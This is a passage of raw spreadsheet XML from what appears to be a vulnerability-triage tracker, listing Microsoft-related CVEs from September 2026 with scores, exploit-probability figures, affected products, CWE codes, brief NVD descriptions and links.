/><c r="N729" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O729" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P729" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q729" s="5" t="inlineStr" /><c r="R729" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S729" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Message Queuing Queue Manager allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T729" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68887</t></is></c></row><row r="730"><c r="A730" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B730" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C730" s="5" t="inlineStr"><is><t>CVE-2026-69329</t></is></c><c r="D730" s="5" t="n"><v>7.5</v></c><c r="E730" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F730" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G730" s="5" t="inlineStr" /><c r="H730" s="5" t="n"><v>0.011</v></c><c r="I730" s="5" t="inlineStr" /><c r="J730" s="5" t="inlineStr" /><c r="K730" s="5" t="inlineStr" /><c r="L730" s="5" t="inlineStr" /><c r="M730" s="5" t="inlineStr" /><c r="N730" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O730" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P730" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q730" s="5" t="inlineStr" /><c r="R730" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="S730" s="5" t="inlineStr"><is><t>Out-of-bounds read in BranchCache allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T730" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69329</t></is></c></row><row r="731"><c r="A731" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B731" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C731" s="5" t="inlineStr"><is><t>CVE-2026-69342</t></is></c><c r="D731" s="5" t="n"><v>7.5</v></c><c r="E731" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F731" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G731" s="5" t="inlineStr" /><c r="H731" s="5" t="n"><v>0.011</v></c><c r="I731" s="5" t="inlineStr" /><c r="J731" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K731" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L731" s="5" t="inlineStr" /><c r="M731" s="5" t="inlineStr" /><c r="N731" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O731" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P731" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q731" s="5" t="inlineStr" /><c r="R731" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S731" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T731" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t></is></c></row><row r="732"><c r="A732" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B732" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C732" s="5" t="inlineStr"><is><t>CVE-2026-69378</t></is></c><c r="D732" s="5" t="n"><v>7.5</v></c><c r="E732" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F732" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G732" s="5" t="inlineStr" /><c r="H732" s="5" t="n"><v>0.011</v></c><c r="I732" s="5" t="inlineStr" /><c r="J732" s="5" t="inlineStr" /><c r="K732" s="5" t="inlineStr" /><c r="L732" s="5" t="inlineStr" /><c r="M732" s="5" t="inlineStr" /><c r="N732" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O732" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P732" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q732" s="5" t="inlineStr" /><c r="R732" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="S732" s="5" t="inlineStr"><is><t>Uncontrolled recursion in Microsoft Exchange Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T732" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69378</t></is></c></row><row r="733"><c r="A733" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B733" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C733" s="5" t="inlineStr"><is><t>CVE-2026-69397</t></is></c><c r="D733" s="5" t="n"><v>7.5</v></c><c r="E733" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F733" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G733" s="5" t="inlineStr" /><c r="H733" s="5" t="n"><v>0.006</v></c><c r="I733" s="5" t="inlineStr" /><c r="J733" s="5" t="inlineStr"><is><t>openssh</t></is></c><c r="K733" s="5" t="inlineStr" /><c r="L733" s="5" t="inlineStr" /><c r="M733" s="5" t="inlineStr" /><c r="N733" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O733" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P733" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q733" s="5" t="inlineStr" /><c r="R733" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S733" s="5" t="inlineStr"><is><t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T733" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t></is></c></row><row r="734"><c r="A734" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B734" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C734" s="5" t="inlineStr"><is><t>CVE-2026-69428</t></is></c><c r="D734" s="5" t="n"><v>7.5</v></c><c r="E734" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F734" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G734" s="5" t="inlineStr" /><c r="H734" s="5" t="n"><v>0.011</v></c><c r="I734" s="5" t="inlineStr" /><c r="J734" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K73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34" s="5" t="inlineStr" /><c r="M734" s="5" t="inlineStr" /><c r="N734" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O734" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P734" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q734" s="5" t="inlineStr" /><c r="R734" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S734" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T734" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69428</t></is></c></row><row r="735"><c r="A735" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B735" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C735" s="5" t="inlineStr"><is><t>CVE-2026-69429</t></is></c><c r="D735" s="5" t="n"><v>7.5</v></c><c r="E735" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F735" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G735" s="5" t="inlineStr" /><c r="H735" s="5" t="n"><v>0.006</v></c><c r="I735" s="5" t="inlineStr" /><c r="J735" s="5" t="inlineStr" /><c r="K735" s="5" t="inlineStr" /><c r="L735" s="5" t="inlineStr" /><c r="M735" s="5" t="inlineStr" /><c r="N735" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O735" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P735" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q735" s="5" t="inlineStr" /><c r="R735" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S735" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows IKE Extension allows an authorized attacker to execute code over a network.</t></is></c><c r="T735" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69429</t></is></c></row><row r="736"><c r="A736" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B736" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C736" s="5" t="inlineStr"><is><t>CVE-2026-69443</t></is></c><c r="D736" s="5" t="n"><v>7.5</v></c><c r="E736" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F736" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G736" s="5" t="inlineStr" /><c r="H736" s="5" t="n"><v>0.01</v></c><c r="I736" s="5" t="inlineStr" /><c r="J736" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K736" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L736" s="5" t="inlineStr" /><c r="M736" s="5" t="inlineStr" /><c r="N736" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O736" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P736" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q736" s="5" t="inlineStr" /><c r="R736" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S736" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Device Health Attestation (DHA) allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T736" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69443</t></is></c></row><row r="737"><c r="A737" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B737" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C737" s="5" t="inlineStr"><is><t>CVE-2026-69514</t></is></c><c r="D737" s="5" t="n"><v>7.5</v></c><c r="E737" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F737" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G737" s="5" t="inlineStr" /><c r="H737" s="5" t="n"><v>0.007</v></c><c r="I737" s="5" t="inlineStr" /><c r="J737" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K73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37" s="5" t="inlineStr" /><c r="M737" s="5" t="inlineStr" /><c r="N737" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O737" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P737" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q737" s="5" t="inlineStr" /><c r="R737" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S737" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T737" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t></is></c></row><row r="738"><c r="A738" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B738" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C738" s="5" t="inlineStr"><is><t>CVE-2026-69539</t></is></c><c r="D738" s="5" t="n"><v>7.5</v></c><c r="E738" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F738" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G738" s="5" t="inlineStr" /><c r="H738" s="5" t="n"><v>0.005</v></c><c r="I738" s="5" t="inlineStr" /><c r="J738" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K73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38" s="5" t="inlineStr" /><c r="M738" s="5" t="inlineStr" /><c r="N738" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O738" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P738" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q738" s="5" t="inlineStr" /><c r="R738" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S738" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T738" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t></is></c></row><row r="739"><c r="A739" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B739" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C739" s="5" t="inlineStr"><is><t>CVE-2026-69587</t></is></c><c r="D739" s="5" t="n"><v>7.5</v></c><c r="E739" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F739" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G739" s="5" t="inlineStr" /><c r="H739" s="5" t="n"><v>0.012</v></c><c r="I739" s="5" t="inlineStr" /><c r="J739" s="5" t="inlineStr" /><c r="K739" s="5" t="inlineStr" /><c r="L739" s="5" t="inlineStr" /><c r="M739" s="5" t="inlineStr" /><c r="N739" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O739" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P739" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q739" s="5" t="inlineStr" /><c r="R739" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S739" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T739" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69587</t></is></c></row><row r="740"><c r="A740" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B740" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C740" s="5" t="inlineStr"><is><t>CVE-2026-69588</t></is></c><c r="D740" s="5" t="n"><v>7.5</v></c><c r="E740" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F740" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G740" s="5" t="inlineStr" /><c r="H740" s="5" t="n"><v>0.012</v></c><c r="I740" s="5" t="inlineStr" /><c r="J740" s="5" t="inlineStr" /><c r="K740" s="5" t="inlineStr" /><c r="L740" s="5" t="inlineStr" /><c r="M740" s="5" t="inlineStr" /><c r="N740" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O740" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P740" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q740" s="5" t="inlineStr" /><c r="R740" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S740" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows TCP/IP allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T740" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69588</t></is></c></row><row r="741"><c r="A741" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B741" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C741" s="5" t="inlineStr"><is><t>CVE-2026-69599</t></is></c><c r="D741" s="5" t="n"><v>7.5</v></c><c r="E741" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F741" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G741" s="5" t="inlineStr" /><c r="H741" s="5" t="n"><v>0.007</v></c><c r="I741" s="5" t="inlineStr" /><c r="J741" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K741" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L741" s="5" t="inlineStr" /><c r="M741" s="5" t="inlineStr" /><c r="N741" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O741" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P741" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q741" s="5" t="inlineStr" /><c r="R741" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S741" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T741" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t></is></c></row><row r="742"><c r="A742" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B742" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C742" s="5" t="inlineStr"><is><t>CVE-2026-69607</t></is></c><c r="D742" s="5" t="n"><v>7.5</v></c><c r="E742" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F742" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G742" s="5" t="inlineStr" /><c r="H742" s="5" t="n"><v>0.006</v></c><c r="I742" s="5" t="inlineStr" /><c r="J742" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K742" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L742" s="5" t="inlineStr" /><c r="M742" s="5" t="inlineStr" /><c r="N742" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O742" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P742" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q742" s="5" t="inlineStr" /><c r="R742" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S742" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T742" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69607</t></is></c></row><row r="743"><c r="A743" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B743" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C743" s="5" t="inlineStr"><is><t>CVE-2026-69631</t></is></c><c r="D743" s="5" t="n"><v>7.5</v></c><c r="E743" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F743" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G743" s="5" t="inlineStr" /><c r="H743" s="5" t="n"><v>0.012</v></c><c r="I743" s="5" t="inlineStr" /><c r="J743" s="5" t="inlineStr" /><c r="K743" s="5" t="inlineStr" /><c r="L743" s="5" t="inlineStr" /><c r="M743" s="5" t="inlineStr" /><c r="N743" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O743" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P743" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q743" s="5" t="inlineStr" /><c r="R743" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S743" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T743" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69631</t></is></c></row><row r="744"><c r="A744" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B744" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C744" s="5" t="inlineStr"><is><t>CVE-2026-69710</t></is></c><c r="D744" s="5" t="n"><v>7.5</v></c><c r="E744" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F744" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G744" s="5" t="inlineStr" /><c r="H744" s="5" t="n"><v>0.002</v></c><c r="I744" s="5" t="inlineStr" /><c r="J744" s="5" t="inlineStr" /><c r="K744" s="5" t="inlineStr" /><c r="L744" s="5" t="inlineStr" /><c r="M744" s="5" t="inlineStr" /><c r="N744" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O744" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P744" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q744" s="5" t="inlineStr" /><c r="R744" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S744" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T744" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69710</t></is></c></row><row r="745"><c r="A745" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B745" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C745" s="5" t="inlineStr"><is><t>CVE-2026-69739</t></is></c><c r="D745" s="5" t="n"><v>7.5</v></c><c r="E745" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F745" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G745" s="5" t="inlineStr" /><c r="H745" s="5" t="n"><v>0.008999999999999999</v></c><c r="I745" s="5" t="inlineStr" /><c r="J745" s="5" t="inlineStr" /><c r="K745" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L745" s="5" t="inlineStr" /><c r="M745" s="5" t="inlineStr" /><c r="N745" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O745" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P745" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q745" s="5" t="inlineStr" /><c r="R745" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S745" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T745" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69739</t></is></c></row><row r="746"><c r="A746" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B746" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C746" s="5" t="inlineStr"><is><t>CVE-2026-69744</t></is></c><c r="D746" s="5" t="n"><v>7.5</v></c><c r="E746" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F746" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G746" s="5" t="inlineStr" /><c r="H746" s="5" t="n"><v>0.011</v></c><c r="I746" s="5" t="inlineStr" /><c r="J746" s="5" t="inlineStr" /><c r="K746" s="5" t="inlineStr" /><c r="L746" s="5" t="inlineStr" /><c r="M746" s="5" t="inlineStr" /><c r="N746" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O746" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P746" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q746" s="5" t="inlineStr" /><c r="R746" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S746" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T746" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69744</t></is></c></row><row r="747"><c r="A747" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B747" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C747" s="5" t="inlineStr"><is><t>CVE-2026-69760</t></is></c><c r="D747" s="5" t="n"><v>7.5</v></c><c r="E747" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F747" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G747" s="5" t="inlineStr" /><c r="H747" s="5" t="n"><v>0.011</v></c><c r="I747" s="5" t="inlineStr" /><c r="J747" s="5" t="inlineStr" /><c r="K747" s="5" t="inlineStr" /><c r="L747" s="5" t="inlineStr" /><c r="M747" s="5" t="inlineStr" /><c r="N747" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O747" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P747" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q747" s="5" t="inlineStr" /><c r="R747" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S747" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T747" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69760</t></is></c></row><row r="748"><c r="A748" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B748" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C748" s="5" t="inlineStr"><is><t>CVE-2026-69793</t></is></c><c r="D748" s="5" t="n"><v>7.5</v></c><c r="E748" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F748" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G748" s="5" t="inlineStr" /><c r="H748" s="5" t="n"><v>0.008</v></c><c r="I748" s="5" t="inlineStr" /><c r="J748" s="5" t="inlineStr" /><c r="K748" s="5" t="inlineStr" /><c r="L748" s="5" t="inlineStr" /><c r="M748" s="5" t="inlineStr" /><c r="N748" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O748" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P748" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q748" s="5" t="inlineStr" /><c r="R748" s="5" t="inlineStr"><is><t>CWE-1288</t></is></c><c r="S748" s="5" t="inlineStr"><is><t>Improper validation of consistency within input in Windows TCP/IP allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T748" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69793</t></is></c></row><row r="749"><c r="A749" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B749" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C749" s="5" t="inlineStr"><is><t>CVE-2026-69803</t></is></c><c r="D749" s="5" t="n"><v>7.5</v></c><c r="E749" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F749" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G749" s="5" t="inlineStr" /><c r="H749" s="5" t="n"><v>0.008</v></c><c r="I749" s="5" t="inlineStr" /><c r="J749" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K749" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L749" s="5" t="inlineStr" /><c r="M749" s="5" t="inlineStr" /><c r="N749" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O749" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P749" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q749" s="5" t="inlineStr" /><c r="R749" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S749" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T749" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t></is></c></row><row r="750"><c r="A750" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B750" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C750" s="5" t="inlineStr"><is><t>CVE-2026-69804</t></is></c><c r="D750" s="5" t="n"><v>7.5</v></c><c r="E750" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F750" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G750" s="5" t="inlineStr" /><c r="H750" s="5" t="n"><v>0.005</v></c><c r="I750" s="5" t="inlineStr" /><c r="J750" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K750" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L750" s="5" t="inlineStr" /><c r="M750" s="5" t="inlineStr" /><c r="N750" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O750" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P750" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q750" s="5" t="inlineStr" /><c r="R750" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S750" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T750" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t></is></c></row><row r="751"><c r="A751" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B751" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C751" s="5" t="inlineStr"><is><t>CVE-2026-69805</t></is></c><c r="D751" s="5" t="n"><v>7.5</v></c><c r="E751" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F751" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G751" s="5" t="inlineStr" /><c r="H751" s="5" t="n"><v>0.005</v></c><c r="I751" s="5" t="inlineStr" /><c r="J751" s="5" t="inlineStr" /><c r="K751" s="5" t="inlineStr" /><c r="L751" s="5" t="inlineStr" /><c r="M751" s="5" t="inlineStr" /><c r="N751" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O751" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P751" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q751" s="5" t="inlineStr" /><c r="R751" s="5" t="inlineStr"><is><t>CWE-200, 